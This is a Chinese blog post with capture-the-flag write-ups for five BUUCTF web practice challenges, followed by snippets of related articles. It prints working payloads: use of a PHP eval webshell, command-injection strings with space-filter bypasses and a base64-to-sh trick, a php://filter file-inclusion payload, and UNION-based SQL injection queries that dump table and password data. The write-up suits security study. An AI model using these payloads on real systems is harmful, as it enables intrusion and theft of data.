记录BUUCTF的五道题 Secret File,Exec,LoveSQL,Ping Ping Ping,Knife

最新推荐文章于 2022-10-26 23:20:28 发布
最新推荐文章于 2022-10-26 23:20:28 发布
阅读量333 收藏
点赞数 2
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/trytowritecode/article/details/121108799
版权

先从简单的题目开始讲起
Knife
打开靶机在这里插入图片描述好的看到

eval($_POST["Syc"]);

两种解法一种菜刀,蚁剑直接连,另一种利用漏洞的本质无需工具。
因为这个利用的是远程代码执行的漏洞所以可以直接修改POST的提交参数来利用漏洞。废话不多上解法,我这边用的是蚁剑在这里插入图片描述好的直接连接
在这里插入图片描述
在这里插入图片描述根目录下有个flag文件直接点开
解法2
利用漏洞不知道为什么我的火狐的hackbar的插件不允许我提交post的数据,所以我post的提交都是用burpsuite去完成的
直接抓包在这里插入图片描述提交方式改为POST的提交根据提示添加Syc=phpinfo();可以看到成功执行phpinfo();
然后这边eval函数我去网上查了一会儿,发现是用var_dump()和scandir()来进行远程代码执行的。system()的话应该使用ls和cat进行。
然后构造
Syc=var_dump(scandir(’/’));在这里插入图片描述找到flag然后构造
Syc=var_dump(file_get_contents(’/flag’));去读取flag中的内容
答案:
flag{60eb1232-624d-4aed-afba-84460f77046a}

第二道
Exec打开靶机在这里插入图片描述输入1;ls
在这里插入图片描述看到index.php文件应该是页面内容不是我们想要的那我们直接输入1;ls / 查看根目录在这里插入图片描述好的flag文件不请自来
直接1;cat /flag
答案
flag{358b0d11-481b-4eed-8062-5fea97fff4f5}

第三道
ping ping ping 第三道讲这个不是因为难度,而是这道题是上面一道的延伸,我觉得放在一起讲会更有帮助。打开靶机在这里插入图片描述好的界面又是和ip啥的有关,说实话我当时是先写这道题再去写上面那道的,以至于我当时拿到这道题傻呗的去试模板注入x-forword-for好像是这个,但是不是这个漏洞,只是我自己想多了。
提示 ?ip=
想应该是 $_GET[“ip”],直接一把梭
?ip=1;ls在这里插入图片描述直接?ip=1;cat flag.php
在这里插入图片描述fxck 我的空格这么狠 空格绕过的话我直接去查
${IFS}
$IFS$1
<
<>
{cat,flag.php}

大家自己试一下ps:有几个我是看过来的不知道行不行因为这道题过滤了好多字符
?ip=1;cat$IFS$1flag.php
页面提示 f*ck我的flag,那我看看index.php总行了吧在这里插入图片描述小家伙过滤的还挺多这里不带大家一一审计了,因为基本都是正则的匹配,我想的是拼接绕过正则匹配,有大佬也说看到后面的 $a= 可以直接考虑变量覆盖,其实我有点懵。但是不妨碍我构造payload

?ip=1;b=a;c=g;a=fl;cat$IFS$1$a$b$c.php
在这里插入图片描述nmd东西呢????按下F12看看,差点以为自己输错了,小家伙给我注释了
答案
flag{05f012eb-f6a0-4491-b1b6-77517ed135dd}
这道题我后来去看了博客上的大佬还有好多种解,我当时就真的佩服他们是真tm的牛,因为过滤了bash就用sh
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
将cat flag.php base64加密后再解密真的天才
第四题secret file
在这里插入图片描述有小秘密????
页面没什么东西F12看看
在这里插入图片描述有个链接/Archive_room.php访问他看看在这里插入图片描述按一下小按钮
在这里插入图片描述我还啥都没看到呢???
这时候我们F12看到network的地方
在这里插入图片描述这里有个action.php很可疑啊,再看看前面的状态码302好的重定向到这个结束的页面,那就用burpsuite来干他,奥利给
在这里插入图片描述看到了啥secr3t.php 直接访问

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

这个过滤有点弱啊,该过滤的一个都没过滤,看到include()文件包含php伪协议一把梭,这个payload挺万能的大家可以用一哈
php://filter/read=convert.base64-encode/resource=
那串base64值有点长大家自己复制吧,我这里有点懒得复制了。

第五题love sql 哈哈这道题我当时真的要笑出来了在这里插入图片描述随便输入一下
在这里插入图片描述这边要先测试注入点是username还是password大家可以自己试一试,试出来是password这边的注入,接下来猜password=1’
在这里插入图片描述看到报错了 ‘‘1’’’ 后面多了个引号那就–+注释掉在这里插入图片描述还是报错??’’'三个引号,这里–+难道没注释掉吗?
那继续注释在这里插入图片描述那放入 or 1=1
在这里插入图片描述给我账号密码有勾八用-.-,那就用最简单的sql语句吧这里用information_schema的有据查询,

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' --+ --+

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' --+ --+

1' union select 1,2,group_concat(password) from l0ve1ysq1 --+ --+

答案
flag{f1a0a2e8-6e78-477b-aa54-38be2c8984cb}
结束!大家写完题目记得记录知识点呦!!

递归 trash can
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF Web基本知识点和解思路(1)
weixin_43456810的博客
11-29 1916
BUUCTF Web基本知识点和解思路 url里出现了类似于/?ip=这样的参数,可以首先尝试命令注入,如?ip=127.0.0.1, ?ip=127.0.0.1;ls, ?ip=127.0.0.1;cat flag.php,通过执行注入命令获取到flag的信息。注意:如果网站对空格进行了过滤,则可以使用其他方法进行绕过,如拼接绕过:?ip=127.0.0.1;b=lag;a=f;cat$IFS$a$b.php 命令注入127.0.0.1;ls,如果发现当前目录没有flag文件时,可以去上级目录查看,
BUUCTF-web极客大挑战
zhhhb1005的博客
04-17 3679
目录 [极客大挑战 2019]Knife [极客大挑战 2019]Http [极客大挑战 2019]Upload ​ [极客大挑战 2019]PHP [极客大挑战 2019]Knife eval($_POST["Syc"]); 这是一个典型的后门程序,用蚁剑链接复制url,密码则是页面中给的密码Syc。 在根目录下找到flag文件,得出flag。 [极客大挑战 2019]Http 打开页面后查看源代码,发现一个php文件 打开链接node4.buuoj..
Web学习之路(BUUCTF之旅3)
AKAXPD的博客
01-24 1866
一、[GXYCTF2019]Ping Ping Ping 二、[极客大挑战 2019]Knife 进入目标靶机里,非常简洁明了,只有一个以GET方式传参的提示,那我们随便传一个ip。 /?ip=1;ls看一下都有什么。发现了"flag.php"文件,flag应该就在这里。 /?ip=1;cat flag.php 发现行不通,应该是空格被过滤掉了,要想办法绕过。 这里我使用$IFS$1绕过空格。 但由于我不知道他到底过滤了多少东西,这里我决定先看"index.php"文件。 和
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File
weixin_42566218的博客
02-21 1213
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File 目链接:BUUCTF 类型:文件包含 知识点: 302隐式重定向、php伪协议(php://filter) 解过程 直接看页面没啥信息,F12打开控制台发现一个超链接,因为设置了style样式和背景颜色一样所以看不出来,其实可以在页面中用ctrl+a找到这个超链接标签 跟随超链接进入到Archive_room.php页面,这里有一个SECRET链接标签,用控制台看是链接到action.php页面的 但是点
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1474
SQL注入的解大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
utils:带有curl,wget,ping,nslookup,dig,psql等工具的Docker映像
05-07
实用程序 使用curl,wget,ping,netcat,nslookup,host,dig,psql,mysql,swaks等工具的Docker映像用例使用容器时,您可能需要测试容器之间的连通性。 您的应用程序容器将没有curl,ping,psql client等工具。...
knife4File
11-10
Knife4File:高效日志文件切割工具详解》 在日志管理中,尤其是在服务器监控、故障排查等场景下,大型日志文件的处理往往成为一项挑战。这时,一款名为"Knife4File"的工具应运而生,专门用于切割大日志文件,将其...
Knife_for_File_V1.6.zip
04-29
Knife for File V1.6:高效解决大型文件管理难》 在信息技术高速发展的今天,文件的体积越来越大,尤其在Windows操作系统环境下,大型文件的处理成为了一项挑战。"Knife for File V1.6"正是为了解决这一问而...
knife4file.zip
03-17
1. 下载并解压"knife4file.zip",得到可执行文件"knife4file" 和可能的使用手册"Knife4File"。 2. 使用命令行界面运行"knife4file",指定要分割的大日志文件及其输出路径和分片大小。 3. 分割完成后,可以在指定目录...
Knife4File大文件分割
09-05
Knife4File大文件分割 nife for File 大文件切割器 ----------------------------------------------------------------------------------------------------- 1.可以精确切割/复原文件,巨型文件(>4GB)也可搞定,...
文件包含练习1
qq_61109509的博客
02-07 963
大佬文章
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1481
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 目 Pwn类,[BJDCTF 2nd]secret 下载目文件 secret 思路 老规矩使用file...
CTF MISC解思路总结篇
qq_53105813的博客
07-04 8268
杂项总结
CTF-杂项与密码学总结
热门推荐
xcsxchen
08-15 1万+
杂项 01文件操作与隐写 文件类型识别 1.File命令 当文件没有后缀名或者有后缀名而无法正常打开时,根据识别出的文件类型来修改后缀名即可正常打开文件。 使用场景:不知道后缀名,无法打开文件。格式: file myheart 2.winhex 通过winhex.程序中可以查看文件头类型,根据文件头类型判断出文件类型 使用场景: windows 下通过文件头信息判断文件类型 3.文件头残缺/错误 通常文件无法正常打开有两种情况,一种是文件头部残缺, 另一种是文件头部字段错误。针对文件头部残缺的情况,使用
每周刷(三)
qidiandexiaowu
10-03 378
目录web 1 [极客大挑战 2019]Havefunweb 2 [极客大挑战 2019]Secret Fileweb 3 [护网杯 2018]easy_tornadoweb 4 [ACTF2020 新生赛]IncludeCrypto 1 [BJDCTF 2nd]灵能精通-y1ngCypto 2 权限获得第一步Cypto 3 萌萌哒猪八戒Cypto 4 [BJDCTF 2nd]Y1nglish-y1ngMisc 1 被嗅探的流量Misc 2 小明的保密箱Crypto 3 爱因斯坦Cypto 4 easyca
buuctf-misc-[SWPU2019]Network1
mlws1900的博客
09-27 508
发现是base64加密套娃,用个脚本跑一下。下载得到一个txt文本,打开查看。发现pk改zip,和上面的一样。这个代码获得txt的格式。
BUUCTF:[SWPU2019]Network
末初的CSDN博客
11-11 2435
https://buuoj.cn/challenges#[SWPU2019]Network TTL隐写 import binascii with open('attachment.txt','r') as fp: a=fp.readlines() p=[] for x in range(len(a)): p.append(int(a[x])) s='' for i in p: if(i==63): b='0
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3644
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
[极客大挑战 2019]Knife 1(蚁剑连接/安装)
weixin_45253573的博客
11-18 797
打开环境 eval($_POST[“Syc”]); 作为后门用post提交一个字符串Syc 直接拿蚁剑连接 连接之后在根目录下发现了flag 获取flag 介绍一下蚁剑的安装: AntSword-Loader:https://github.com/AntSwordProject/AntSword-Loader antSword:https://github.com/AntSwordProject/antSword 这两个下载好之后解压 在AntSword-Loader-v4.0.3-win32
knife4j界面 按shift+F5 后乱了 怎么还原
最新发布
07-13
如果在使用Knife4j界面时按下了Shift+F5导致界面混乱,可以尝试以下方法还原: 1. 清除浏览器缓存:按下Ctrl+Shift+Delete(或者Shift+F5)打开浏览器的清除缓存选项,选择清除浏览器缓存或清除所有网站数据。然后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值